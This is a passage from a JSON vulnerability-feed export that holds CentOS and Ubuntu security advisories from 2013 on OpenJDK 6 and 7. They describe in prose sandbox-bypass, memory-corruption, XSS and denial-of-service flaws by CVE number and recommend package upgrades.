Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. 
(CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.6.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-November/020016.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-November/020019.html\n\n**Affected packages:**\njava-1.6.0-openjdk\njava-1.6.0-openjdk-demo\njava-1.6.0-openjdk-devel\njava-1.6.0-openjdk-javadoc\njava-1.6.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1505.html", "modified": "2013-11-05T21:41:40", "published": "2013-11-05T20:45:16", "href": "http://lists.centos.org/pipermail/centos-announce/2013-November/020016.html", "id": "CESA-2013:1505", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:1451\n\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component 
native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocess XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. 
(CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. (CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. 
All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-October/019985.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1451.html", "modified": "2013-10-23T11:04:05", "published": "2013-10-23T11:04:05", "href": "http://lists.centos.org/pipermail/centos-announce/2013-October/019985.html", "id": "CESA-2013:1451", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:46", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2013:1447\n\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850,\nCVE-2013-5838)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. 
An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocess XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JAXP, JGSS, AWT, Beans, and Scripting components in OpenJDK.\nAn untrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5851, CVE-2013-5800,\nCVE-2013-5849, CVE-2013-5790, CVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasier to perform cross-site scripting attacks. (CVE-2013-5804,\nCVE-2013-5797)\n\nVarious OpenJDK classes that represent cryptographic keys could leak\nprivate key information by including sensitive data in strings returned by\ntoString() methods. These flaws could possibly lead to an unexpected\nexposure of sensitive key data. 
(CVE-2013-5780)\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added\ninto the HTML pages it generated. Crafted content in the memory of a Java\nprogram analyzed using jhat could possibly be used to conduct cross-site\nscripting attacks. (CVE-2013-5772)\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC\nresponses. A malformed packet could cause a Java application using JGSS to\nexit. (CVE-2013-5803)\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these updated\npackages, which resolve these issues. All running instances of OpenJDK Java\nmust be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-October/019980.html\n\n**Affected packages:**\njava-1.7.0-openjdk\njava-1.7.0-openjdk-demo\njava-1.7.0-openjdk-devel\njava-1.7.0-openjdk-javadoc\njava-1.7.0-openjdk-src\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1447.html", "modified": "2013-10-22T07:41:01", "published": "2013-10-22T07:41:01", "href": "http://lists.centos.org/pipermail/centos-announce/2013-October/019980.html", "id": "CESA-2013:1447", "title": "java security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2019-05-29T17:23:18", "bulletinFamily": "unix", "description": "Several vulnerabilities were discovered in the OpenJDK JRE related to information disclosure and data integrity. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-3829, CVE-2013-5783, CVE-2013-5804)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to availability. An attacker could exploit these to cause a denial of service. (CVE-2013-4002, CVE-2013-5803, CVE-2013-5823, CVE-2013-5825)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to data integrity. 
(CVE-2013-5772, CVE-2013-5774, CVE-2013-5784, CVE-2013-5797, CVE-2013-5820)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure. An attacker could exploit these to expose sensitive data over the network. (CVE-2013-5778, CVE-2013-5780, CVE-2013-5790, CVE-2013-5840, CVE-2013-5849, CVE-2013-5851)\n\nSeveral vulnerabilities were discovered in the OpenJDK JRE related to information disclosure, data integrity and availability. An attacker could exploit these to cause a denial of service or expose sensitive data over the network. (CVE-2013-5782, CVE-2013-5802, CVE-2013-5809, CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5830, CVE-2013-5842, CVE-2013-5850)", "modified": "2013-11-21T00:00:00", "published": "2013-11-21T00:00:00", "id": "USN-2033-1", "href": "https://usn.ubuntu.com/2033-1/", "title": "OpenJDK 6 vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}